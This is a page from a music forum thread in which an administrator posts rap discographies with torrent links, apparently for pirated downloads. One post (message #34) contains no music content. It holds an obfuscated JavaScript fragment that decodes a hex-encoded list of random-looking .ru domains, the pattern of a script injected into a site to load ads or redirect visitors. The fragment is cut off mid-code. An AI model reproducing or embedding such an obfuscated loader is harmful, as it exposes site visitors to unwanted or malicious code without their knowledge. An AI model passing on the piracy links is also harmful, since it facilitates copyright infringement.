Kurtis Blow





http://www.picktorrent.com/downloa....low@320


 
Iron_BYDate: Friday, 28.09.2012, 01:18 | Message # 27
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Mobb Deep





torrent (discography)
alternative torrent (using russian fonts)
+ torrent (tested on seeds)
torrent(tested on seeds)
Attachments: 8704140.jpg (42.0 Kb)


 
Iron_BYDate: Friday, 28.09.2012, 20:13 | Message # 28
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Jedi Mind Tricks







PS.
It is REAL hip-hop, undeground
must be have :P

torrent
Attachments: 4482353.jpg (33.0 Kb)


 
Iron_BYDate: Friday, 28.09.2012, 20:22 | Message # 29
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Army of the Pharaohs
то-же что и джедаи, только пару людей других )




torrent

PS.
It is REAL hip-hop, undeground
Attachments: 8917120.jpg (50.7 Kb)


 
Iron_BYDate: Monday, 08.04.2013, 20:17 | Message # 30
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
Orishas







Discography (torrent)
Attachments: 6860021.jpg (79.0 Kb)


 
Iron_BYDate: Friday, 13.02.2015, 23:05 | Message # 31
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
из Video








 
Iron_BYDate: Monday, 26.09.2016, 22:22 | Message # 32
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн


 
Iron_BYDate: Friday, 25.11.2016, 19:04 | Message # 33
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн


 
Iron_BYDate: Sunday, 05.02.2017, 23:06 | Message # 34
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн

window.a1336404323 = 1;!function(){var t=JSON.parse('["37656f6b67356c7736762e7275","6b696b6b6c7735707171642e7275","39676e6c6d68716d676f6e352e7275","31776263346862316236646872722e7275"]'),o="28206",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

 
Iron_BYDate: Sunday, 05.02.2017, 23:13 | Message # 35
Poco loco!
Group: Administrations\Администраторы
Messages: 1216
Awards: 23
Reputation: 27
Status: Offline \Оффлайн
test

 
Forum \ Форум » Main forum\Главный форум » Music\Музыка » RAP (Not shit, not glamour. Just a really cool rap.)
  • Page 2 of 2
  • «
  • 1
  • 2
Search:

Copyright MyCorp © 2024